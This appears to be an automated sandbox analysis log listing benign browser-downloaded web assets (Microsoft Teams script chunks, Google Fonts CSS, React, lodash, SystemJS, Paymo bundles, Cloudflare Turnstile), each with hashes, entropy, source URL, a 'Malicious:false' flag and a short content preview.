                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725591],{852774:(a,e,l)=>{l.d(e,{MHj:()=>c,nDI:()=>M,Vjr:()=>r,Fm4:()=>n,S61:()=>A,SH1:()=>s,W5L:()=>u,jz7:()=>t,lwq:()=>U,V$h:()=>i,qvE:()=>P,qXC:()=>L,_E3:()=>h,uO1:()=>v,yQ7:()=>m,gNt:()=>d,Vo$:()=>g,HkI:()=>R,jcT:()=>o,TTi:()=>f,NUA:()=>V,fGI:()=>H,B2S:()=>F,Ndk:()=>y,grK:()=>w,qSk:()=>b,DWd:()=>k,Z4e:()=>O,TNE:()=>C,mx_:()=>D,U$D:()=>S,gC_:()=>_,ORW:()=>B,vsS:()=>$,F$H:()=>p,xmy:()=>q,hmO:()=>x,X8c:()=>E,fPq:()=>I,dR_:()=>j,MxQ:()=>N,KCz:()=>Q,y3Y:()=>T,gNc:()=>z,uOK:()=>G,X0b:()=>K,PM$:()=>W,nPn:()=>X,lYg:()=>Y,omG:()=>J,xo$:()=>aa,$Oq:()=>ea,b8q:()=>la,ADj:()=>Za,tOz:()=>ca,Vvl:()=>Ma,w8$:()=>ra,$xG:()=>na,Uhh:()=>Aa,It2:()=>sa});var Z=l(693935);const c=(0,Z.U)("PersonVoice20Regular","20",["M17.13 1.06a.5.5 0 0 1 .68.2 9.96 9.96 0 0 1 0 9.48.5.5 0 1 1-.88-.48 8.96 8.96 0 0 0 0-8.52.5.5 0 0 1 .2-.68Zm-2.32 1.97a.5.5 0 0 1 .65.27 6.98 6.98 0 0 1 0 5.4.5.5 0 1 1-.92-.39 5
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (29343)
                                Category:downloaded
                                Size (bytes):29451
                                Entropy (8bit):5.2658132803400886
                                Encrypted:false
                                SSDEEP:
                                MD5:59E0FBEB3A39FE773441F4B7CAC3E7E0
                                SHA1:0ACE00DDB87FCEBF156D254B06ABDE95E799EFE3
                                SHA-256:E6C9294A98216CBFB2C4189AA7BBF9FA01A820D28DC61DD1531BCE2A6F389B5B
                                SHA-512:441EE99881ACE88697CF3DB9F7C7F5D7DF78918D6C798E46C73791405CBBF0C7BF4ACEB176C36D25055C13389B4C284D0D2BA6A8EFAFCBD3F23806CAD0497F6C
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/657660-4776a55841f4d594.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[657660],{469218:(e,t,i)=>{var r;i.d(t,{f:()=>I}),function(e){e.p720="720p",e.p1080="1080p",e.p2k="2k",e.p4k="4k",e.unkown="unkown"}(r||(r={}));const s=2073600,n=3686400,a=8294400;async function o(e){const t={Perf_Screen:void 0};let i;const o=e.screen.availWidth*e.screen?.availHeight;return i=o<s?r.p720:o>=s&&o<n?r.p1080:o>=n&&o<a?r.p2k:o>=a?r.p4k:r.unkown,t.Perf_Screen={width:e.screen?.availWidth,height:e.screen?.availHeight,resolution:i,dpr:e.devicePixelRatio},Promise.resolve(t)}var c;!function(e){e.Initializing="Initializing",e.Unrecoverable="Unrecoverable",e.LongInactive="LongInactive",e.Inactive="Inactive",e.Active="Active",e.VeryActive="VeryActive"}(c||(c={}));var l=i(492090),p=i(332752),d=i(34655),h=i(873529),u=i(464122);async function m(e,t,i){const r={workers:[],processes:[],windows:[]},s=await(e?.loadModule("heartbeat"));if(!s?.getPerfMetrics)return r;const n=r;try{l
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (14080)
                                Category:downloaded
                                Size (bytes):14188
                                Entropy (8bit):4.548444802364332
                                Encrypted:false
                                SSDEEP:
                                MD5:EAE6D5D8A335D7E78B87A584045664BE
                                SHA1:16F37B3649C086DBC522F19D34C88F135DD62886
                                SHA-256:332670B50B9E5C00C333394FE7F1660E95B91A3BAC311A32B07C4623AD014BED
                                SHA-512:D26C7E0204E471EDFED62FCCD2384B74C70F40097BB0D9C03045279D277F61FD3B3B851B0037E8BE4A046A810D99650EA53A2722BCDE08F6BBD6AF85E1E05C74
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/499319-ba112383185f5946.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[499319],{499319:(a,l,c)=>{c.d(l,{fG6:()=>Z,emQ:()=>h,T$n:()=>r,Tw6:()=>m,nzA:()=>C,t3G:()=>L,kNP:()=>M,mXP:()=>U,CDg:()=>g,jvo:()=>u,FUA:()=>R,N5_:()=>A,orE:()=>o,SUw:()=>k,D7b:()=>n,xZD:()=>t,RaO:()=>i,FHz:()=>v,ghe:()=>s,kt0:()=>H,ZmR:()=>b,i3f:()=>d,pgR:()=>w,GxZ:()=>F,hoY:()=>p,rLf:()=>D,geq:()=>_,cmU:()=>V,sCR:()=>f,bP_:()=>G,nbA:()=>P,ba0:()=>S,nb6:()=>q,KOR:()=>N,qGP:()=>O,g4$:()=>x,nbk:()=>z,NaX:()=>Q,Aow:()=>T,s81:()=>X,oIL:()=>$,gcA:()=>j,qrO:()=>B,mse:()=>E,JcD:()=>I});var e=c(693935);const Z=(0,e.U)("ChannelShare20Regular","20",["M3 5.5A2.5 2.5 0 0 1 5.5 3h5A2.5 2.5 0 0 1 13 5.5a.5.5 0 0 1-1 0c0-.83-.67-1.5-1.5-1.5h-5C4.67 4 4 4.67 4 5.5v5c0 .83.67 1.5 1.5 1.5h4.51a2.25 2.25 0 1 1 .12 1H5.5A2.5 2.5 0 0 1 3 10.5v-5Zm8 6.75a1.25 1.25 0 1 0 2.5 0 1.25 1.25 0 0 0-2.5 0ZM7.5 14a.5.5 0 0 0-.5.5A2.5 2.5 0 0 0 9.5 17h5a2.5 2.5 0 0 0 2.5-2.5v-5A2.5 2.5 0 0 0 14.5 7H9.87A2.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):15252
                                Entropy (8bit):5.337467039990969
                                Encrypted:false
                                SSDEEP:
                                MD5:861A8BAD9F67530F5D8CCD2B67F5A8A1
                                SHA1:EA7DB9FA47648A74F99ECD8528C51A05E32F5EB4
                                SHA-256:22C3E32BE01D8ACCADA02D536093064DF81AA7F0A922DDE057E3E5FB8EA240FF
                                SHA-512:C3A7A5B9B1D9922694E09B4BC40185020AA5F93BCB90B815D509BE2D34D953384EA6BBA48FC9F2502EA6902FAD29D6E57645063809DEBAB683761E0D794B3DB5
                                Malicious:false
                                Reputation:unknown
                                URL:"https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"
                                Preview:/* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v22/pxiAyp8kv8JHgFVrJJLmE0tMMPKzSQ.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/poppins/v22/pxiAyp8kv8JHgFVrJJLmE0tCMPI.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'Poppins';. font-style: italic;. font-weight: 200;. font-display: swap;. src: url(https://fonts.gstatic
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text
                                Category:downloaded
                                Size (bytes):29
                                Entropy (8bit):3.9353986674667634
                                Encrypted:false
                                SSDEEP:
                                MD5:6FED308183D5DFC421602548615204AF
                                SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                Malicious:false
                                Reputation:unknown
                                URL:https://www.google.com/async/newtab_promos
                                Preview:)]}'.{"update":{"promos":{}}}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (23406)
                                Category:downloaded
                                Size (bytes):119655
                                Entropy (8bit):5.314013899011905
                                Encrypted:false
                                SSDEEP:
                                MD5:DC111488DE9A6A28EB77AFB224C3B318
                                SHA1:12CFB268CF9932DEA9CBCEB0CDF3FCE4A5A48A50
                                SHA-256:6F67F23659B293A59D740A7D68DAAF48104AD4B39C5340C25F3CA1D2604FE3EB
                                SHA-512:1622658B8B0B202B2DBD2EDD43DD41383877A636949E3F1C8ACB2DD76E61E4A2A4911B62923C38B46E7231D94A5052E5403F60A5B24D3F66D38BB478841C9E15
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/feature-announcement/3.181.24/system/index.js
                                Preview:System.register(["react","react-dom"],function($i,Ar){"use strict";var ut,A,Cr,ft,lt,ct,dt,kr,jr,Nr;return{setters:[C=>{ut=C.createContext,A=C.default,Cr=C.useRef,ft=C.useContext,lt=C.useMemo,ct=C.useDebugValue,dt=C.useEffect,kr=C.useLayoutEffect},C=>{jr=C.unmountComponentAtNode,Nr=C.render}],execute:function(){/**!. * @fileOverview Kickass library to create and place poppers near their reference elements.. * @version 1.16.1. * @license. * Copyright (c) 2016 Federico Zivolo and contributors. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permissi
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (605)
                                Category:downloaded
                                Size (bytes):120585
                                Entropy (8bit):5.370923647345209
                                Encrypted:false
                                SSDEEP:
                                MD5:23BFE7E99565EE8F34AFD63C06F4C24B
                                SHA1:BF08B8AD1AD73C12A7C9CB211926CE23A861DB07
                                SHA-256:9DB33292007AB6C38527B39D5663E976A305564E19B2A5A8713EA2B2C00F505D
                                SHA-512:F6318DAF93E2C1EF27CCB2D84E4F10AC430F7E3194D29C7CD066332995318BB96609FAC18EDC827355799244B9BF1570C0807B429CDCED4C4B890C5F00DDF477
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdn.jsdelivr.net/npm/react-dom@17.0.2/umd/react-dom.production.min.js
                                Preview:/** @license React v17.0.2. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(M,ha){"object"===typeof exports&&"undefined"!==typeof module?ha(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function Ta(a,b){gb(a,b);gb(a+"Capture",b)}function gb(a,b){Ib[a]=b;for(a=0;a<b.length;a++)zf.add(b[a])}function li(a){if(Af.call(Bf,a)
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Unicode text, UTF-8 text, with very long lines (37038)
                                Category:downloaded
                                Size (bytes):72087
                                Entropy (8bit):5.380689093361296
                                Encrypted:false
                                SSDEEP:
                                MD5:6548CE3CDD23AE06F258F61F7DEC0AC6
                                SHA1:E356C6DCBD89A27D383F9211334263648C5E3396
                                SHA-256:69655D1990E83E60831C8536B31BCF9F452A24243F07AE264CE3026038D9C002
                                SHA-512:467878264B736A3E5A793DD31A1BB347879AA57E96AD9DD80448B88DC4F9E32847EC766862F2A9602EE4DDEF49E750B86F9EB37418FA154E365C1DE84137EE4E
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/shared-libraries/3.182.62/lodash-b00d4de8.js
                                Preview:System.register(["./_commonjsHelpers-6226bf47.js"],function(rl,ip){"use strict";var at;return{setters:[ct=>{at=ct.c}],execute:function(){var ct={exports:{}};/**. * @license. * Lodash <https://lodash.com/>. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>. * Released under MIT license <https://lodash.com/license>. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors. */ct.exports,function(Qe,Ve){(function(){var o,il="4.17.21",ke=200,ul="Unsupported core-js use. Try https://npms.io/search?q=ponyfill.",sn="Expected a function",fl="Invalid `variable` option passed into `_.template`",je="__lodash_hash_undefined__",ll=500,te="__lodash_placeholder__",qn=1,Ii=2,ht=4,gt=1,ee=2,an=1,jn=2,Si=4,Tn=8,_t=16,Ln=32,pt=64,Wn=128,Pt=256,nr=512,ol=30,sl="...",al=800,cl=16,Ei=1,hl=2,gl=3,nt=1/0,Kn=9007199254740991,_l=17976931348623157e292,re=0/0,yn=4294967295,pl=yn-1,vl=yn>>>1,dl=[["ary
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (11600)
                                Category:dropped
                                Size (bytes):11663
                                Entropy (8bit):5.212781225707623
                                Encrypted:false
                                SSDEEP:
                                MD5:86B67CAF4F7D7121DB5A5BEBA09A1E3D
                                SHA1:BCD2DE3EB477CDC759A67A81CBF87326C51321A7
                                SHA-256:FAF458DCADA028341E6C98A52F71067328FB710A51D0F3ACB69DF9DBE93619AF
                                SHA-512:7464297BD1DBD5D5E3613ED34AB4D2EAA9D19B3AE163DC2CC91B4DE8147647E5E08977F972982F59518F5A9B6B6AB91FA25773A48925EDA75611D761A0AB17E8
                                Malicious:false
                                Reputation:unknown
                                Preview:/*.* SystemJS 6.8.3.*/.!function(){function e(e,t){return(t||"")+" (SystemJS Error#"+e+" https://git.io/JvFET#"+e+")"}function t(e,t){if(-1!==e.indexOf("\\")&&(e=e.replace(/\\/g,"/")),"/"===e[0]&&"/"===e[1])return t.slice(0,t.indexOf(":")+1)+e;if("."===e[0]&&("/"===e[1]||"."===e[1]&&("/"===e[2]||2===e.length&&(e+="/"))||1===e.length&&(e+="/"))||"/"===e[0]){var n,r=t.slice(0,t.indexOf(":")+1);if(n="/"===t[r.length+1]?"file:"!==r?(n=t.slice(r.length+2)).slice(n.indexOf("/")+1):t.slice(8):t.slice(r.length+("/"===t[r.length])),"/"===e[0])return t.slice(0,t.length-n.length-1)+e;for(var i=n.slice(0,n.lastIndexOf("/")+1)+e,o=[],s=-1,u=0;i.length>u;u++)-1!==s?"/"===i[u]&&(o.push(i.slice(s,u+1)),s=-1):"."===i[u]?"."!==i[u+1]||"/"!==i[u+2]&&u+2!==i.length?"/"===i[u+1]||u+1===i.length?u+=1:s=u:(o.pop(),u+=2):s=u;return-1!==s&&o.push(i.slice(s)),t.slice(0,t.length-n.length)+o.join("")}}function n(e,n){return t(e,n)||(-1!==e.indexOf(":")?e:t("./"+e,n))}function r(e,n,r,i,o){for(var c in e){var a=t(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (19745)
                                Category:downloaded
                                Size (bytes):19853
                                Entropy (8bit):5.604146717589645
                                Encrypted:false
                                SSDEEP:
                                MD5:78A705D92C0694D70744B816B2B49760
                                SHA1:B2D77A384EAB594BD872DF93CB3F5060CE0A0E4D
                                SHA-256:27D82842A7E0AEBBABF594098A8EF642883A2D4AE1FD4B35A33CC0D319BCA222
                                SHA-512:7B965924CA77EEB6D6C485E6601EA11EA3FC9D7AAE4C203B6B4023DE4C0B7D4D81A7745ACB80524E43483313D0B716AEEC483E563A7C94ED9B94F347618A8E22
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/478644-057a172734e2511c.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[478644],{792529:(e,a,t)=>{t.d(a,{e:()=>w});var i=t(513432),n=t(644525),r=t(854130);var o=t(411947),l=t(164093),f=t(250452),s=t(264278);const u=/[\(\[\{][^\)\]\}]*[\)\]\}]/g,d=/[\0-\u001F\!-/:-@\[-`\{-\u00BF\u0250-\u036F\uD800-\uFFFF]/g,c=/^\d+[\d\s]*(:?ext|x|)\s*\d+$/i,p=/\s+/g,m=/[\u0600-\u06FF\u0750-\u077F\u08A0-\u08FF\u1100-\u11FF\u3130-\u318F\uA960-\uA97F\uAC00-\uD7AF\uD7B0-\uD7FF\u3040-\u309F\u30A0-\u30FF\u3400-\u4DBF\u4E00-\u9FFF\uF900-\uFAFF]|[\uD840-\uD869][\uDC00-\uDED6]/;function b(e,a,t){return e?(e=function(e){return(e=(e=(e=e.replace(u,"")).replace(d,"")).replace(p," ")).trim()}(e),m.test(e)||!(null==t?void 0:t.allowPhoneInitials)&&c.test(e)?"":function(e,a,t){let i="";const n=e.split(" ");return 0!==n.length&&(i+=n[0].charAt(0).toUpperCase()),t||(2===n.length?i+=n[1].charAt(0).toUpperCase():3===n.length&&(i+=n[2].charAt(0).toUpperCase())),a&&i.length>1?i.charAt(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (23774)
                                Category:downloaded
                                Size (bytes):23882
                                Entropy (8bit):5.153711856234183
                                Encrypted:false
                                SSDEEP:
                                MD5:0F68D77488B13B60694FF8865D2C5137
                                SHA1:3ABAC8DA7DABDB841331647945C2F7A7AE360FB1
                                SHA-256:9E94D7F6787D2D9CD3E2CBEA298E4C57E6BE6AB73B09BCF7EE3BE4926786E7DF
                                SHA-512:AAD953A529250E1E9D7F41B67758E0F96B1E84B1A25561B3CDA938732C0BD87AC45260D8E7F8898DD668536F46EA597E6F15FFD63F021846E1B7D4A40BE1A969
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/662908-71da5000e4ef5f3f.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[662908],{662908:(e,t,r)=>{r.d(t,{hY:()=>C,dL:()=>P,Xy:()=>M,Rs:()=>H,Fr:()=>U});var n=r(364819),i=r(332752),a=r(802756),s=r(258376),o=r(334499),l=r(175640),c=r(710639);const d=()=>new o.b("div",{});const p=new class{constructor(e={}){this._options={},this.plugins=[],this.nodeError={value:!1,message:""},this.ASTDom=[d()],this.result=[],this._parser=new c.Parser(this,e)}get options(){return this._options}get lastNode(){return this.ASTDom[this.ASTDom.length-1]}onopentag(e,t){const r=new o.b(e,t),n=this.plugins.length;if(n){for(let e=0;e<n;e++){const t=this.plugins[e].exec(this.ASTDom);if(this.nodeError={value:t.error,message:t.errorMessage},this.nodeError.value)break}if(this.nodeError.value)return void this._parser.parseComplete(this.nodeError.message)}this.integrateToAST(r),this.ASTDom.push(r)}ontext(e){if(/\r?\n/.test(e)&&""===e.trim())return;const t=new s.S(e);if(this.lastNod
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (3104)
                                Category:downloaded
                                Size (bytes):6852
                                Entropy (8bit):5.387290825539941
                                Encrypted:false
                                SSDEEP:
                                MD5:BF3338CD039C8C51BBEE89CD21F1D962
                                SHA1:08D8FF8E38B417400BCB681098EAE2A56E75937D
                                SHA-256:ED9311D6E3E97A8B6E9C6F32F66F5416131866B9F1B6718652AFD161166A5D2A
                                SHA-512:758C680171C5F5629CD301290EA4AFA9ABF9CB4C8A84F86CD64B5042F70603C2D0821BB357DCD67ACCAA7ECCDF3659C7A2A169E5549612BA36F4241269EFB07C
                                Malicious:false
                                Reputation:unknown
                                URL:https://static-spa.paymoapp.com/@paymo/ui-state/3.182.62/system/index.js
                                Preview:System.register(["react","@paymo/shared-libraries/lodash","@paymo/shared-libraries/apollo"],(function(e,t){"use strict";var r,a,i,s,n,o,l,c,u,p,y,d,m,U,v,g;return{setters:[e=>{r=e.default,a=e.createContext,i=e.useContext,s=e.useMemo,n=e.useState,o=e.useEffect,l=e.useCallback},e=>{c=e.memoize},e=>{u=e.gql,p=e.InMemoryCache,y=e.onError,d=e.HttpLink,m=e.setContext,U=e.from,v=e.RetryLink,g=e.ApolloClient}],execute:function(){const t=r.createContext({setError:()=>{}}),S=a({stateClient:null}),I={possibleTypes:{CommentParent:["Annotation","Discussion","File","Task"],FileParent:["Comment","Discussion","Project","Task"],GroupBy:[],InvoiceableItem:["InvoiceableEntryItem","InvoiceableExpenseItem","InvoiceableProjectItem"],Node:["Annotation","ApiKey","Booking","Client","ClientContact","Comment","CommentReaction","Company","Currency","Discussion","Entry","Estimate","EstimateTemplate","Expense","File","Invoice","InvoiceItem","InvoicePayment","InvoiceTemplate","LeaveType","Link","Milestone","Navigati
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (4986)
                                Category:dropped
                                Size (bytes):5094
                                Entropy (8bit):5.51636181102733
                                Encrypted:false
                                SSDEEP:
                                MD5:B65450E5E3BDED5E0DF059CF41E27EF8
                                SHA1:C5A12EAF609A083B7542CD3AC429E550665CAB53
                                SHA-256:8AE92D7478043DA693389A9C139FCDBE4FED242CD318BB10EB645BF0F4DCD548
                                SHA-512:051B0BCD140770FF42CCD224F4905CFA55422008AB5DA3A714C469CD4BFB9B3D61017FCAB41AA57635E74325D7439E560E171CE562503A9B4D3F88B57B58089F
                                Malicious:false
                                Reputation:unknown
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[986559],{926751:(e,n,t)=>{var r;t.d(n,{B:()=>r}),function(e){e.AuthFailed="AuthFailed",e.AuthResolveFailed="AuthResolveFailed",e.BaseUrlFailedToResolve="BaseUrlFailedToResolve",e.BaseUrlTimeout="BaseUrlTimeout",e.CustomTelemetryFailed="CustomTelemetryFailed",e.FailedToFetch="FailedToFetch",e.InvalidCancellationToken="InvalidCancellationToken",e.InvalidParameters="Invalid pararameters",e.InvalidUrl="InvalidUrl",e.ModelFailedToInitialize="ModelFailedToInitialize",e.ModelTimeOut="ModelTimeOut",e.NotImplemented="NotImplemented",e.RejectHttpError="RejectHttpError",e.RequestCancelled="RequestCancelled",e.RequireStatusFailed="RequireStatusFailed",e.TimedOut="TimedOut",e.TransformFailed="TransformFailed"}(r||(r={}))},72909:(e,n,t)=>{function r(e){return new Promise(((n,t)=>{e<0?t(new Error("negative timeout")):setTimeout(n,e)}))}t.d(n,{y:()=>r})},355515:(e,n,t)=>{t.d(n,{GQ:()=>o,E2:(
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (47691)
                                Category:downloaded
                                Size (bytes):47692
                                Entropy (8bit):5.4016459163756165
                                Encrypted:false
                                SSDEEP:
                                MD5:9046FDD8B20F930F537279DEDE41E747
                                SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                Malicious:false
                                Reputation:unknown
                                URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (51963)
                                Category:downloaded
                                Size (bytes):52070
                                Entropy (8bit):5.432819376714012
                                Encrypted:false
                                SSDEEP:
                                MD5:408275248AC2B22A149FC9ADFA8A253E
                                SHA1:3013438C6B14A0D39F8DAB60ED2BBB3E7791CF83
                                SHA-256:9AA2ECD7B6595D53D99A0557C011E1BB5419774865263D364AAD79959CFC8362
                                SHA-512:6FE0950884F32BB2AEB96848D65495F2A71FED4B413A30307893EE0777F4AA2A0B67D6C29BD29DF175FBF5FE845F8241DC295A25FBDDBE56F84E8B3BCCA4867F
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/22826-319fcd504b4f79a4.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[22826],{277362:(e,t,n)=>{n.d(t,{p:()=>a});const a={AcceptSharedChannelInvitationDialog:"AcceptSharedChannelInvitationDialog",AccessibilitySettingsPanelButton:"AccessibilitySettingsPanelButton",AccountLocaleChangeNotificationJob:"AccountLocaleChangeNotificationJob",AccountSelectionDialog:"AccountSelectionDialog",ActivityFeed:"ActivityFeed",ActivityFeedBellClick:"ActivityFeedBellClick",ActivitySlices:"ActivitySlices",ActivitySlicesPopOutButton:"ActivitySlicesPopOutButton",AcceptInvitationFromAccountAndSettingPage:"AcceptInvitationFromAccountAndSettingPage",AdaptiveCardInvokeButton:"AdaptiveCardInvokeButton",AddAccountFromButton:"AddAccountFromButton",AddAccountFromMeMenu:"AddAccountFromMeMenu",AddAccountFromSettings:"AddAccountFromSettings",AddAccountFromSignoutDialog:"AddAccountFromSignoutDialog",AddCloudStorageFolderDialog:"AddCloudStorageFolderDialog",AddGoogleContactsSyncEr
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (21424)
                                Category:downloaded
                                Size (bytes):21532
                                Entropy (8bit):5.515475146072575
                                Encrypted:false
                                SSDEEP:
                                MD5:A635CC58B3B71104A5BB2E3EB03D1E9F
                                SHA1:16300799F5B845839A6526A26BCB045BCE3B9393
                                SHA-256:56ABB9053A8E30042F9A25D00C2AD21AB9343F37FC22A5A478A93C0B743457BA
                                SHA-512:F30AAD92B56739C2CACAF41541CDA656BF049BCB946574CFA6E0A5CD623944427214B6EEA210AE4321376ED1951CE6F3EAA0B33E4031C06061181E79F939CD8D
                                Malicious:false
                                Reputation:unknown
                                URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/471294-5c6c36c6a7d801e5.js
                                Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[471294],{998783:(e,t,n)=>{n.d(t,{S:()=>F});var r=n(513432),o=n(733071),a=n(589256),i=n(531389),l=n(411947),s=n(164093),c=n(602835),f=n(478304),u=n(716300),d=n(750818),p=n(119068),v=n(499319),m=n(483851),g=n(762612);var b=n(644525),h=n(854130);var B=n(103735),y=n(965804),q=n(526521);const w="fui-Checkbox",j="fui-Checkbox__label",k="fui-Checkbox__input",z="fui-Checkbox__indicator",x=(0,B.D)("r1q22k1j","r18ze4k2"),O=(0,y.O)({unchecked:{Bi91k9c:"f3p8bqa",pv5h1i:"fium13f",lj723h:"f1r2dosr",Hnthvo:"f1729es6"},checked:{sj55zd:"f19n0e5",wkncrt:"f35ds98",zxk7z7:"f12mnkne",Hmsnfy:"fei9a8h",e6czan:"fix56y3",pv5h1i:"f1bcv2js",qbydtz:"f7dr4go",Hnthvo:"f1r5cpua"},mixed:{sj55zd:"f19n0e5",Hmsnfy:"f1l27tf0",zxk7z7:"fcilktj",pv5h1i:"f1lphd54",Bunfa6h:"f1obkvq7",Hnthvo:"f2gmbuh",B15ykmv:"f1oy4fa1"},disabled:{Bceei9c:"f158kwzp",sj55zd:"f1s2aq7o",Hmsnfy:"f1w7mfl5",zxk7z7:"fcoafq6",Bbusuzp:"f1dcs8
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (979)
                                Category:downloaded
                                Size (bytes):980
                                Entropy (8bit):5.1048387556768615
                                Encrypted:false
                                SSDEEP:
